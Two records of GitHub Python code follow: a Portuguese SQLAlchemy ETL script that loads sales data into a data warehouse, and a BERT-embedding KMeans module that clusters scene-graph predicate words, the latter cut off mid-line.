+{"seq_id":"73291064902","text":"import collections\nfrom doctest import testfile\nfrom itertools import count\nimport re\nimport string\nfrom traceback import print_tb\nfrom turtle import home\nimport turtle\nfrom unittest import result\nfrom xml.dom.minidom import Notation\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import delete\nfrom sqlalchemy import text\nimport sqlalchemy as sa\nfrom time import perf_counter\nimport time\nfrom datetime import date, datetime, timedelta\nimport timeit\nfrom Entidades import cliente,fornecedores,itensNota,itensPedido,notaFiscais,parcelas,pedidos,produtos,dmCliente,dmFornecedores,dmProdutos,dmTempo,dmTipoVendas,ftImpontualidades,ftVendas\nfrom Entidades.tempo import Tempo\nfrom conection import connect_db\n\nengine = connect_db()\nmetadata = sa.MetaData(bind=None)\n\n#Tabelas\ntable_clientes = sa.Table('CLIENTES', metadata, autoload=True, autoload_with=engine)\ntable_fornecedores = sa.Table('FORNECEDORES', metadata, autoload=True, autoload_with=engine)\ntable_itensNota = sa.Table('ITENS_DE_NOTA', metadata, autoload=True, autoload_with=engine)\ntable_itensPedido = sa.Table('ITENS_DE_PEDIDO', metadata, autoload=True, autoload_with=engine)\ntable_notasFiscais = sa.Table('NOTAS_FISCAIS', metadata, autoload=True, autoload_with=engine)\ntable_parcelas = sa.Table('PARCELAS', metadata, autoload=True, autoload_with=engine)\ntable_pedidos = sa.Table('PEDIDOS', metadata, autoload=True, autoload_with=engine)\ntable_produtos = sa.Table('PRODUTOS', metadata, autoload=True, autoload_with=engine)\n\ndm_clientes= sa.Table('DM_CLIENTES', metadata, autoload=True, autoload_with=engine)\ndm_fornecedores = sa.Table('DM_FORNECEDORES', metadata, autoload=True, autoload_with=engine)\ndm_produtos = sa.Table('DM_PRODUTOS', metadata, autoload=True, autoload_with=engine)\ndm_tempo = sa.Table('DM_TEMPO', metadata, autoload=True, autoload_with=engine)\ndm_tipos_vendas = sa.Table('DM_TIPOS_VENDAS', metadata, autoload=True, autoload_with=engine)\nft_impontualidade = sa.Table('FT_IMPONTUALIDADE', metadata, autoload=True, autoload_with=engine)\nft_vendas = sa.Table('FT_VENDAS', metadata, autoload=True, autoload_with=engine)\n\ndef Exclude():\n start = timeit.default_timer() \n print(\"Iniciando limpeza da base de dados!\")\n engine.execute(text('DELETE ft_vendas'))\n engine.execute(text('DELETE ft_impontualidade'))\n engine.execute(text('DELETE dm_clientes'))\n engine.execute(text('DELETE dm_fornecedores'))\n engine.execute(text('DELETE dm_produtos'))\n engine.execute(text('DELETE dm_tempo'))\n engine.execute(text('DELETE dm_tipos_vendas'))\n end = timeit.default_timer()\n r = (end - start)\n print(f\"Tempo total da execução: {r} segundos\")\n\n#EXTRAIR \n\ndef ExtractCliente():\n cli = []\n count = 0\n print(\"Iniciando extração de Cliente\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_clientes])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n cli.append(cliente.Clietes(row[0],row[1],row[2],row[3],row[4]))\n count += 1\n \n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Clientes\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return cli\n\ndef ExtractFornecedores():\n forn = []\n count = 0\n print(\"Iniciando extração de Fornecedores\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_fornecedores])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n 
forn.append(fornecedores.Fornecedores(row[0],row[1],row[2],row[3]))\n count += 1\n \n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Fornecedores\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return forn\n\ndef ExtractItensNotas():\n inot = []\n count = 0\n print(\"Iniciando extração dos Itens Notas\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_itensNota])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n inot.append(itensNota.ItensNota(row[0],row[1],row[2],row[3]))\n count += 1\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Itens notas\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return inot\n\ndef ExtractItensPedido():\n iped = []\n count = 0\n print(\"Iniciando extração dos Itens pedido\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_itensPedido])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n iped.append(itensNota.ItensNota(row[0],row[1],row[2],row[3]))\n count += 1\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Itens pedido\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return iped\n\ndef ExtractNotasFiscais():\n nf = []\n count = 0\n print(\"Iniciando extração das Notas ficais\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_notasFiscais])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n nf.append(notaFiscais.NotasFiscais(row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9]))\n count += 1\n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção das Notas ficais\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return nf\n\ndef ExtractParcelas():\n parc = []\n count = 0\n print(\"Iniciando extração das Parcelas\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_parcelas])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n parc.append(parcelas.Parcelas(row[0],row[1],row[2],row[3]))\n count += 1\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção das Parcelas\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return parc\n\ndef ExtractPedidos():\n ped = []\n count = 0\n print(\"Iniciando extração dos Pedidos\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_pedidos])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n ped.append(pedidos.Pedidos(row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7]))\n count += 1\n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Pedidos\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return ped\n\ndef ExtractProdutos():\n prod = []\n count = 0\n print(\"Iniciando extração dos Prodtos\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_produtos])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n prod.append(produtos.Produtos(row[0],row[1],row[2],row[3],row[4],row[5]))\n count += 1\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Produtos\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return prod\n\ndef ExtractTempo():\n temp = 
[]\n count = 0\n print(\"Iniciando extração dos Tempos\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_notasFiscais])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n temp.append(Tempo(row[7]))\n count += 1\n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Tempos\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return temp\n\n###TRANSFORMAÇÃO \n\ndef TransformarCliente():\n clientesDW = []\n print(\"Iniciando processo de transformação de Clientes\")\n start = timeit.default_timer()\n cli = ExtractCliente()\n \n \n for i in cli:\n clientesDW.append(dmCliente.DMCliente(i.cod_cli,i.nom_cli,\"Aracaju\",\"SE\"))\n \n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação dos Clientes. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return clientesDW\n\ndef TransformarFornecedor():\n fornecedoresDW = []\n c = 0\n print(\"Iniciando processo de transformação de Fornecedores\")\n start = timeit.default_timer()\n forn = ExtractFornecedores()\n \n \n for i in forn:\n c+=1\n fornecedoresDW.append(dmFornecedores.DMFornecedores(c,i.nom_forn,i.uf_forn))\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação dos Fornecedores. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return fornecedoresDW\n\ndef TransformarProdutos():\n produtosDW = []\n print(\"Iniciando processo de transformação de Produtos\")\n start = timeit.default_timer()\n produtos = ExtractProdutos()\n \n \n for i in produtos:\n produtosDW.append(dmProdutos.DMProdutos(i.cod_prod,i.dsc_prod,\"Teste\"))\n \n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação dos Produtos. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return produtosDW\n\ndef TransformarTempo():\n tempoDW = []\n count = 0\n print(\"Iniciando processo de transformação de Tempo\")\n start = timeit.default_timer()\n tempo = ExtractTempo()\n \n \n for i in tempo:\n count+=1\n tempoDW.append(dmTempo.DMTempo(count,i.dat_nota.strftime(\"%Y\"),int(i.dat_nota.strftime(\"%m\")),int(i.dat_nota.strftime(\"%Y\")),i.dat_nota.strftime(\"%b\"),NomMes(int(i.dat_nota.strftime(\"%m\")))[0:3],'0000',23))\n \n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação dos Tempo. 
\"\n f\"- Tempo de transformação: {r} segundos\")\n \n return tempoDW\n\ndef Turn(hora):\n turno = \"Teste\"\n h = int(hora)\n if(h < 12):\n turno = \"MANHA\"\n elif(h > 12 and h <= 18):\n turno = \"TARDE\"\n elif(h > 18):\n turno = \"NOITE\"\n return turno\n\ndef NomMes(num):\n nome = \"Teste\"\n if(num == \"01\"):\n nome = \"Janeiro\"\n elif(num == \"02\"):\n nome = \"Fevereiro\"\n elif(num == \"03\"):\n nome = \"Março\"\n elif(num == \"04\"):\n nome = \"Abril\"\n elif(num == \"05\"):\n nome = \"Maio\"\n elif(num == \"06\"):\n nome = \"Junho\"\n elif(num == \"07\"):\n nome = \"Julho\"\n elif(num == \"08\"):\n nome = \"Agosto\"\n elif(num == \"09\"):\n nome = \"Setemebro\"\n elif(num == \"10\"):\n nome = \"Outubro\"\n elif(num == \"11\"):\n nome = \"Novembro\"\n elif(num == \"12\"):\n nome = \"Dezembro\"\n \n return nome\n\ndef TransformarTipoVendas():\n tipoVendasDW = []\n cnt = 0\n print(\"Iniciando processo de transformação de Produtos\")\n start = timeit.default_timer()\n produtos = ExtractPedidos()\n \n \n for i in produtos:\n cnt+=1\n tipoVendasDW.append(dmTipoVendas.DMTiposVendas(cnt,\"a vista\" if(i.val_a_prazo == 0) else (\"a prazo\")))\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação dos Tipos de vendas. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return tipoVendasDW\n\ndef TransformarImpontualidade():\n impotualidadeDW = []\n c = 0\n print(\"Iniciando processo de transformação de Impontualidade\")\n start = timeit.default_timer()\n tempo = ExtractTempo()\n \n \n for i in tempo:\n c+=1\n impotualidadeDW.append(ftImpontualidades.FTImpontualidades(c,c,7,8))\n \n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação de Impontualidade. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return impotualidadeDW\n\ndef TransformarVendas():\n vendasDW = []\n c = 0\n print(\"Iniciando processo de transformação de Vendas\")\n start = timeit.default_timer()\n prod = ExtractProdutos()\n \n \n for i in prod:\n c+=1\n vendasDW.append(ftVendas.FTVendas(i.cod_prod,c,c,199))\n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação de Vendas. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return vendasDW\n\n###CARREGAR\n\ndef CarregarDmCliente():\n print(\"Iniciando processo de Carregamento dos Clientes\")\n start = timeit.default_timer()\n cli = TransformarCliente()\n \n for item in cli :\n ins = dm_clientes.insert().values(id_cliente = item.id_cliente, nome_cliente = item.nome_cliente, cidade_cli = item.cidade_cli, uf_cli = item.uf_cli)\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento dos Clientes. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarDmFornecedores():\n print(\"Iniciando processo de Carregamento dos Fornecedores\")\n start = timeit.default_timer()\n forn = TransformarFornecedor()\n \n for item in forn :\n ins = dm_fornecedores.insert().values(id_forn = item.id_forn ,nom_forn = item.nom_forn ,regiao_forn = item.regiao_forn )\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento dos Fornecedores. 
\"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarDmProdutos():\n print(\"Iniciando processo de Carregamento dos Produtos\")\n start = timeit.default_timer()\n prod = TransformarProdutos()\n \n for item in prod :\n ins = dm_produtos.insert().values(id_prod = item.id_prod, dsc_prod = item.dsc_prod, classe_prod = item.classe_prod )\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento dos Fornecedores. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarDmTempo():\n print(\"Iniciando processo de Carregamento dos Produtos\")\n start = timeit.default_timer()\n tempo = TransformarTempo()\n \n for item in tempo :\n ins = dm_tempo.insert().values(id_tempo = item.id_tempo ,nu_ano = item.nu_ano ,nu_mes= item.nu_mes,nu_anomes = item.nu_anomes,sg_mes = item.sg_mes ,nm_mesano = item.nm_mesano ,nm_mes = item.nm_mes, nu_dia = item.nu_dia)\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento dos Fornecedores. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarDmTipoVendas():\n print(\"Iniciando processo de Carregamento dos Tipos de vendas\")\n start = timeit.default_timer()\n mov = TransformarTipoVendas()\n \n for item in mov :\n ins = dm_tipos_vendas.insert().values(id_tipo_venda = item.id_tipo_venda, desc_tipo_venda = item.desc_tipo_venda)\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento dos Tipos de vendas. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarFTImpontualidade():\n print(\"Iniciando processo de Carregamento das Impontualidades\")\n start = timeit.default_timer()\n temp = TransformarTempo() \n cli = TransformarCliente()\n \n for cliente in cli: \n for item in temp :\n ins = ft_impontualidade.insert().values(id_tempo = item.id_tempo, id_cliente = cliente.id_cliente, valor_parc_atrasadas = 156.9, valor_parc_total = 78.6 )\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento das Impontualidades. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarFTVendas():\n c = 0\n print(\"Iniciando processo de Carregamento das Vendas\")\n start = timeit.default_timer()\n temp = TransformarTempo() \n cli = TransformarProdutos()\n tpvenda = TransformarTipoVendas()\n \n for produto in cli:\n c+=1 \n for item in temp :\n for tv in tpvenda:\n ins = ft_vendas.insert().values(id_prod = produto.id_prod, id_tempo = item.id_tempo, id_tipo_venda = tv.id_tipo_venda, id_forn = c, valor_venda = 10 )\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento das Vendas. \"\n f\"- Tempo de transformação: {r} segundos\")\n\ndef ETL():\n print(\"Iniciando rotina ETL\")\n start = timeit.default_timer()\n CarregarDmCliente()\n CarregarDmFornecedores()\n CarregarDmProdutos()\n CarregarDmTempo()\n CarregarDmTipoVendas()\n CarregarFTImpontualidade()\n CarregarFTVendas()\n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado a rotina ETL. \"\n f\"- Tempo de processamente: {r} segundos\")\n\n","repo_name":"FranciscoJSSantos/etl_vendas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17273,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"32257322836","text":"import json\nfrom cv2 import split\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans,MiniBatchKMeans\nfrom sklearn.discriminant_analysis import StandardScaler\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport torch\nfrom tqdm import tqdm\nfrom transformers import BertModel, BertTokenizerFast\nimport scipy\nimport torch.nn.functional as F\nfrom models.MLM.utils import fineTuningDataset\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport torch.nn as nn\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\nimport random\nimport pandas as pd \n\ndef SSE_clu(v1,v2):\n return sum(np.power(v1 - v2,2)) \n\nclass WordsCluster(object):\n def __init__(self, embedding_file, sim_threshold=0.55, del_sim_threshold=0.2, ignore_keywords=[], prep_words=[]):\n self.sim_threshold = sim_threshold\n self.del_sim_threshold = del_sim_threshold\n self.model = BertModel.from_pretrained(embedding_file)\n self.tokenizer = BertTokenizerFast.from_pretrained(embedding_file)\n self.embedding_model = self.model.get_input_embeddings()\n self.ignore_keywords = ignore_keywords\n self.prep_words = prep_words\n self.unexist = set()\n # 初始化embedding信息\n def initial_embedding_info(self, keywords):\n all_keywords_w2v_list = []\n all_keywords_embeddings = torch.tensor([])\n # get embedding of each predicate by the mean of GLOVE vectors of all triplets \n for keyword in keywords:\n with torch.no_grad():\n predicate_embedding = []\n for triplet in keywords[keyword]:\n total_embedding = []\n for w in triplet:\n input = self.tokenizer.encode(w, return_tensors=\"pt\", add_special_tokens = False)\n embedding_token = self.embedding_model(input)\n word_embedding = torch.mean(embedding_token, dim=1)\n total_embedding.append(word_embedding)\n total_embedding = torch.cat(total_embedding, dim=0)\n total_embedding = torch.sum(total_embedding, dim=0)\n total_embedding = total_embedding / len(triplet)\n predicate_embedding.append(total_embedding)\n predicate_embedding = torch.stack(predicate_embedding, dim=0)\n predicate_embedding = torch.mean(predicate_embedding, dim=0).unsqueeze(0)\n all_keywords_w2v_list.append((keyword, predicate_embedding))\n all_keywords_embeddings = torch.cat((all_keywords_embeddings, predicate_embedding), dim=0)\n self.words_w2v_dic = dict(all_keywords_w2v_list)\n return all_keywords_embeddings\n \n # 获取类标\n def get_class_represent_word(self, collection):\n if len(collection) == 0:\n return None\n if len(collection) == 1:\n return collection[0]\n # 计算模平均,求模平均w2v相似度最高词语\n sim_list = [torch.cosine_similarity(key_w2v, torch.mean(torch.stack(collection['words_w2v']), dim=0), dim=1).item() for key_w2v in collection['words_w2v']]\n max_sim = max(sim_list)\n if len(sim_list)==1:\n max_sim = sim_list[0]\n max_sim_index = sim_list.index(max_sim)\n represent_word = collection[\"words\"][max_sim_index]\n represent_word_sim = max_sim\n \n return represent_word, represent_word_sim\n \n # 过滤\n def filt_noise_words(self, collection):\n delete_noise_opinion_words_indexes = []\n scores = [np.mean(np.dot(collection['words_w2v'], x)) for x in collection['words_w2v']]\n # 根据阈值过滤类中相似度较小词\n for i in range(len(scores)):\n if scores[i] <= self.del_sim_threshold:\n delete_noise_opinion_words_indexes.append(i)\n collection['words_w2v'] = [x for (i, x) in enumerate(collection['words_w2v']) if\n i not in delete_noise_opinion_words_indexes]\n collection['words'] = [x for (i, x) in enumerate(collection['words']) if\n i not in 
delete_noise_opinion_words_indexes]\n # t-sne 可视化\n def t_sne_kmeans(self, words_w2v_embeddings):\n vecArr = np.array(words_w2v_embeddings) \n tsneData = TSNE().fit_transform(vecArr)\n\n #开始进行可视化\n f = plt.figure(figsize=(10,10))\n ax = plt.subplot(aspect='equal')\n sc = ax.scatter(tsneData[:,0], tsneData[:,1])\n plt.xlim(-50,50)\n plt.ylim(-50,50)\n ax.axis('off')\n ax.axis('tight')\n plt.savefig('tsne.png')\n\n # 计算欧拉距离\n def calcDis(self, dataSet, centroids, k):\n clalist=[]\n for data in dataSet:\n diff = np.tile(data, (k, 1)) - centroids #相减 (np.tile(a,(2,1))就是把a先沿x轴复制1倍,即没有复制,仍然是 [0,1,2]。 再把结果沿y方向复制2倍得到array([[0,1,2],[0,1,2]]))\n squaredDiff = diff ** 2 #平方\n squaredDist = np.sum(squaredDiff, axis=1) #和 (axis=1表示行)\n distance = squaredDist ** 0.5 #开根号\n clalist.append(distance) \n clalist = np.array(clalist) #返回一个每个点到质点的距离len(dateSet)*k的数组\n return clalist\n\n # 计算质心\n def classify(self, dataSet, centroids, k):\n # 计算样本到质心的距离\n clalist = self.calcDis(dataSet, centroids, k)\n # 分组并计算新的质心\n minDistIndices = np.argmin(clalist, axis=1) #axis=1 表示求出每行的最小值的下标\n newCentroids = pd.DataFrame(dataSet).groupby(minDistIndices).mean() #DataFramte(dataSet)对DataSet分组,groupby(min)按照min进行统计分类,mean()对分类结果求均值\n newCentroids = newCentroids.values\n \n # 计算变化量\n changed = newCentroids - centroids\n \n return changed, newCentroids\n\n\n def cluster(self, keywords, num_clusters, sim_threshold=None):\n '''\n keywords词语聚类\n :param keywords_dic:\n :return:\n '''\n result = []\n if sim_threshold is None:\n sim_threshold = self.sim_threshold\n # we collect all keywords embedding in triplet-level, and get the mean of all relevant triplets as the embedding\n all_keyfeatures = self.initial_embedding_info(keywords)\n st = StandardScaler()\n # all_keyfeatures = st.fit_transform(all_keyfeatures.numpy())\n sk_kmeans = KMeans(n_clusters=num_clusters)\n result_list = sk_kmeans.fit(all_keyfeatures)\n centroids = result_list.cluster_centers_\n closest_centroids_ids = result_list.labels_\n # centroids, closest_centroids_ids = self.train(all_keyfeatures.numpy(), num_clusters, max_iterations=10)\n # find the represented word\n cluster_dict = dict()\n for i, centroid in enumerate(centroids):\n similarity = -1\n for k in self.words_w2v_dic:\n cur_similarity = torch.cosine_similarity(torch.tensor(centroid), self.words_w2v_dic[k], dim=-1)\n if cur_similarity.item() > similarity:\n similarity = cur_similarity\n centroid_label = k\n cluster_dict[str(i)] = dict()\n cluster_dict[str(i)][\"represent_word\"] = centroid_label\n cluster_dict[str(i)][\"words\"] = []\n cluster_dict[str(i)][\"represent_word_sim\"] = similarity.item()\n for m, k in enumerate(self.words_w2v_dic):\n if closest_centroids_ids[m] == i:\n cluster_dict[str(i)][\"words\"].append(k)\n return cluster_dict\n\n \n\n def upgrade_cluster(self, keywords, collection_words_list=[], sim_threshold=None):\n if not sim_threshold:\n sim_threshold = self.sim_threshold\n for i in range(7, min(1, int(sim_threshold * 10) - 3), -1):\n collections, un_seg_words = self.cluster(keywords, collection_words_list, i * 0.1)\n keywords = un_seg_words\n collection_words_list = [x['words'] for x in collections]\n return collections, un_seg_words\n \n def sim(self, w1, w2):\n if w1 in self.embedding_model.unexist or w2 in self.unexist:\n return -1\n w1_w2v = self.embedding_model.get_word_embedding(w1)\n w2_w2v = self.embedding_model.get_word_embedding(w2)\n return np.dot(w1_w2v, w2_w2v) \n def get_embedding(self, triplet):\n total_embedding = []\n for w in triplet:\n input = 
self.tokenizer.encode(w, return_tensors=\"pt\", add_special_tokens = False)\n embedding_token = self.embedding_model(input)\n word_embedding = torch.mean(embedding_token, dim=1)\n total_embedding.append(word_embedding)\n total_embedding = torch.cat(total_embedding, dim=0)\n total_embedding = torch.mean(total_embedding, dim=0)\n return total_embedding \n def train(self, data, num_clusters, max_iterations):\n # data precess\n centroids=self.centroids_init(data, num_clusters)\n # print(data[0])\n #2.开始训练\n num_examples=data.shape[0]\n closest_centroids_ids=np.empty((num_examples,1))\n for i in range(max_iterations):\n # print('current iterations: ', i)\n # 得到当前每个样本到k个中心点的距离,找最近的\n closest_centroids_ids=self.centroids_find_closest(data,centroids) \n #进行中心点位置更新\n centroids=self.centroids_compute(data,closest_centroids_ids,num_clusters)\n # print(centroids)\n # print(closest_centroids_ids)\n return centroids, closest_centroids_ids\n def centroids_init(self, data, num_clusters):\n num_examples=data.shape[0]\n random_ids=np.random.permutation(num_examples) # shuffle the id and select the random centroids\n centroids=data[random_ids[:num_clusters],:]\n return centroids\n def centroids_find_closest(self,data,centroids):\n num_examples = data.shape[0]\n num_centroids = centroids.shape[0]\n closest_centroids_ids = np.zeros((num_examples,1))\n for example_index in range(num_examples) :\n distance = np.zeros((num_centroids,1))\n for centroid_index in range(num_centroids):\n distance_diff = data[example_index,:] - centroids[centroid_index,:]\n distance[centroid_index] = np.sum(distance_diff**2)\n closest_centroids_ids[example_index] = np.argmin(distance)\n return closest_centroids_ids\n def centroids_compute(self, data, closest_centroids_ids, num_clusters):\n num_features = data.shape[1]\n centroids = np.zeros((num_clusters,num_features))\n for centroid_id in range(num_clusters) :\n closest_ids = np.where(closest_centroids_ids == centroid_id)[0]\n centroids[centroid_id] = np.mean(data[closest_ids,:],axis=0)\n return centroids\n\n\n def evaluate_func(self, keywords):\n all_keyfeatures = self.initial_embedding_info(keywords)\n # ls_k = [10,20,30,40,50,60,70,80,90,100,110,120,130,140,150]\n ls_k = range(10,562,10)\n # ls_k = range(2,50)\n ls_sil = []\n ls_ch = []\n ls_elbows =[]\n ls_gs = []\n st = StandardScaler()\n all_keyfeatures = st.fit_transform(all_keyfeatures.numpy())\n for i in ls_k:\n ls_elbow = []\n \n # centroids, closest_centroids_ids = self.train(all_keyfeatures, i, max_iterations=30)\n sk_kmeans = KMeans(n_clusters=i)\n \n result_list = sk_kmeans.fit(all_keyfeatures)\n res2 = result_list.cluster_centers_\n res1 = result_list.labels_\n # res1 = closest_centroids_ids.astype(int).T.tolist()[0]###输出的是聚类类比 closest_centroids_ids\n # res2 = centroids##输出的是聚类中心 centroids\n # normalize all keyfeatures\n # ls_gs.append(self.gap(all_keyfeatures, i))\n for j in range(len(res1)):\n choose_label = res2[int(res1[j]), :]\n sse = SSE_clu(all_keyfeatures[j, :], choose_label)##肘方法\n ls_elbow.append(sse)\n # print(ls_elbow)\n ls_sil.append(metrics.silhouette_score(all_keyfeatures,res1))###轮廓系数\n ls_ch.append(metrics.calinski_harabasz_score(all_keyfeatures,res1))###CH值\n ls_elbows.append(sum(ls_elbow))\n return ls_elbows,ls_sil,ls_ch,ls_gs\n \n\n\n def sum_distance(self, data, k):\n model = KMeans(n_clusters=k)\n result_list = model.fit(data)\n res1 = result_list.labels_\n res2 = result_list.cluster_centers_\n \n disp = 0\n for m in range(data.shape[0]):\n disp += np.linalg.norm(data[m] - res2[res1[m]], axis=0)\n 
return disp\n\n def gap(self, data, k):\n shape = data.shape\n tops = data.max(axis=0)\n bots = data.min(axis=0)\n dists = scipy.matrix(np.diag(tops - bots)) \n rands = scipy.random.random_sample(size=(shape[0], shape[1]))\n rands = rands * dists + bots\n disp = self.sum_distance(data, k)\n refdisps = self.sum_distance(rands, k)\n gap = np.lib.scimath.log(np.mean(refdisps)) - np.lib.scimath.log(disp)\n return gap\n\n def monte_carlo(self, keywords, epochs=10):\n matx_elbows = np.mat(np.zeros((epochs, 56)))\n matx_sil = np.mat(np.zeros((epochs, 56)))\n matx_ch = np.mat(np.zeros((epochs, 56)))\n matx_gs = np.mat(np.zeros((epochs, 56)))\n for i in range(epochs):\n Repoch = self.evaluate_func(keywords)\n matx_elbows[i, :] = Repoch[0]\n matx_sil[i, :] = Repoch[1]\n matx_ch[i, :] = Repoch[2]\n # matx_gs[i, :] = Repoch[3]\n\n mean_elbows = matx_elbows.sum(axis=0) / epochs\n mean_sil = matx_sil.sum(axis=0) / epochs\n mean_ch = matx_ch.sum(axis=0) / epochs\n # matx_gs = matx_gs.sum(axis=0) / epochs\n st = StandardScaler()\n # mean_ch = st.fit_transform(mean_ch)\n # print(mean_ch)\n # mean_ch = mean_ch / max(mean_ch.tolist()[0])\n\n print('SSE',mean_elbows.tolist()[0])\n print('轮廓系数',mean_sil.tolist()[0])\n print('Norm CH值',mean_ch.tolist()[0])\n # print('Gap Statistic',matx_gs.tolist()[0])\n # plt.figure(figsize=(15,8))\n fig = plt.figure(figsize=(15, 8))\n ax1 = fig.add_subplot(1, 1, 1)\n ax2 = ax1.twinx()\n # X = [10,20,30,40,50,60,70,80,90,100,110,120,130,140,150]\n X = range(10,562,10)\n ax1.plot(X, mean_elbows.tolist()[0], marker='o', label='Elbow')\n ax2.plot(X, mean_sil.tolist()[0], 'r', marker='*', label='Silhouette Coefficient')\n # ax2.plot(X, mean_ch.tolist()[0], 'g', marker='*', label='CH norm')\n # ax2.bar(X, matx_gs.tolist()[0], label='Gap Statistic')\n ax1.set_ylabel('SSE', fontsize=20)\n ax1.set_xlabel('K', fontsize=20)\n ax2.set_ylabel('Value', fontsize=20)\n ax1.tick_params(labelsize=20)\n ax2.tick_params(labelsize=20)\n ax1.legend(loc='lower left', fontsize=20)\n ax2.legend(loc='upper right',fontsize=20)\n # plt.show()\n plt.savefig('centroids_4.png')\n \nif __name__ == '__main__':\n vg_dataset = fineTuningDataset('datasets/image_caption_triplet_all.json',\"/home/qifan/datasets/coco/train2014/\",'train')\n # train_dataset = fineTuningDataset('gqa_triplets.json',\"/home/qifan/datasets/GQA/images/\",'train')\n data_loader = DataLoader(vg_dataset, batch_size=8, shuffle=True)\n predicate_words = vg_dataset.predicates_words\n predicate_dict = dict()\n for p in predicate_words:\n predicate_dict[p] = [[p]]\n for triplet_info in vg_dataset.triplets:\n triplet = triplet_info['triplet']\n predicate_dict[triplet[1].lower()].append(triplet)\n prep_words = []\n ignore_words = []\n kmeans = WordsCluster('/home/qifan/FG-SGG_from_LM/bert-base-uncased', ignore_keywords=ignore_words, prep_words=prep_words)\n # kmeans.monte_carlo(predicate_dict)\n # using sim_threshold to initilize the number of clusters for total classes\n # cluster_dict = kmeans.cluster(predicate_dict, num_clusters=230, sim_threshold=0.7)\n # json.dump(cluster_dict, open('utils_data/cluster/CaCao_all_cluster_dict_07.json', 'w'))\n # using sim_threshold to initilize the number of clusters for target classes\n cluster_dict = kmeans.cluster(predicate_dict, num_clusters=39, sim_threshold=0.7)\n json.dump(cluster_dict, 